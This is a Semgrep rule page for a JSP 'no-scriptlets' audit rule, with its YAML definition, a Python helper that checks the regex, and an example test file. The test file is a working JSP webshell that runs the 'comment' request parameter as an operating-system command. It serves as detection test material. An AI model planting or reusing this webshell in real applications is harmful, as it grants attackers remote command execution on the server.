java.lang.security.audit.xss.jsp.no-scriptlets.no-scriptlets
Author: semgrep
Download count: 6,309
License: Commons Clause License Condition v1.0 [LGPL-2.1-only]
JSP scriptlet detected. Scriptlets are difficult to use securely and are considered bad practice. See https://stackoverflow.com/a/3180202. Instead, consider migrating to JSF or using the Expression Language '${...}' with the escapeXml function in your JSP files.
Definition
```yaml
rules:
- id: no-scriptlets
  message: >-
    JSP scriptlet detected. Scriptlets are difficult to use securely and
    are considered bad practice. See https://stackoverflow.com/a/3180202.
    Instead, consider migrating to JSF or using the Expression Language
    '${...}' with the escapeXml function in your JSP files.
  metadata:
    owasp:
    - A03:2021 - Injection
    cwe:
    - "CWE-116: Improper Encoding or Escaping of Output"
    references:
    - https://stackoverflow.com/a/3180202
    - https://stackoverflow.com/a/4948856
    category: security
    technology:
    - jsp
    subcategory:
    - audit
    likelihood: LOW
    impact: LOW
    confidence: LOW
    license: Commons Clause License Condition v1.0[LGPL-2.1-only]
    vulnerability_class:
    - Improper Encoding
  pattern-regex: \<\%[^\@].*
  paths:
    include:
    - "*.jsp"
  languages:
  - regex
  severity: WARNING
```
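To see what the rule's `pattern-regex` does and does not catch, here is an added Python check (not part of Semgrep or of this rule) that runs the regex above over a constructed JSP sample and labels each hit; the `UNESCAPED_EL_RE` heuristic is an assumption of this example, showing the gap the regex leaves once scriptlets are replaced by EL without the escaping the message recommends.

```python
import re

# The rule's own pattern, copied verbatim from the definition above.
SCRIPTLET_RE = re.compile(r"\<\%[^\@].*")

# Heuristic that is NOT part of the rule: EL output with no escapeXml call.
# Assumption added for this example to show what the regex above cannot see.
UNESCAPED_EL_RE = re.compile(r"\$\{(?![^}]*escapeXml)[^}]*\}")

# Constructed sample JSP, one construct per line.
SAMPLE_JSP = """\
<%@ page import="java.util.*,java.io.*"%>
<%-- a JSP comment, no Java inside --%>
<%= request.getParameter("comment") %>
<% out.println(request.getParameter("comment")); %>
${fn:escapeXml(param.comment)}
${param.comment}
"""


def find_scriptlets(jsp_text):
    """Return (line_number, line) pairs that the rule's regex flags."""
    return [(n, line) for n, line in enumerate(jsp_text.splitlines(), 1)
            if SCRIPTLET_RE.search(line)]


def triage(line):
    """Label why a flagged line matched, so review effort goes to real scriptlets."""
    tail = line[line.index("<%") + 2:]
    if tail.startswith("--"):
        return "jsp-comment"   # matched by the regex, but holds no Java at all
    if tail.startswith("="):
        return "expression"    # writes a value straight into the response
    return "scriptlet"         # arbitrary Java in the view layer


def find_unescaped_el(jsp_text):
    """Lines with ${...} output that never passes through escapeXml.

    The rule on this page does not report these; the regex only sees '<%'.
    """
    return [(n, line) for n, line in enumerate(jsp_text.splitlines(), 1)
            if UNESCAPED_EL_RE.search(line)]


if __name__ == "__main__":
    for n, line in find_scriptlets(SAMPLE_JSP):
        print(f"line {n}: {triage(line):<11} {line}")
    for n, line in find_unescaped_el(SAMPLE_JSP):
        print(f"line {n}: unescaped-EL {line}")
```

The page directive on line 1 is skipped because of the `[^\@]` class, while the JSP comment and the `<%=` expression are reported alongside the true scriptlet, so expect some triage on real code bases.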
Examples
no-scriptlets.jsp
```jsp
<!-- cf. https://github.com/JoyChou93/webshell/blob/4a2f049afe009f9cc061357b002cff78c06d6c43/jsp/cmd.jsp -->
<!-- ok: no-scriptlets -->
<%@ page import="java.util.*,java.io.*"%>
<!-- ruleid: no-scriptlets -->
<% %>
<HTML><BODY> <FORM METHOD="GET" NAME="comments" ACTION="">
<INPUT TYPE="text" NAME="comment">
<INPUT TYPE="submit" VALUE="Send">
</FORM> <pre>
<!-- ruleid: no-scriptlets -->
<%
if ( request.getParameter( "comment" ) != null )
{
    out.println( "Command: " + request.getParameter( "comment" ) + "<BR>" );
    Process p = Runtime.getRuntime().exec( request.getParameter( "comment" ) );
    OutputStream os = p.getOutputStream();
    InputStream in = p.getInputStream();
    DataInputStream dis = new DataInputStream( in );
    String disr = dis.readLine();
    while ( disr != null )
    {
        out.println( disr ); disr = dis.readLine();
    }
}
%>
</pre>
</BODY></HTML>
```
Short Link: https://sg.run/l2LG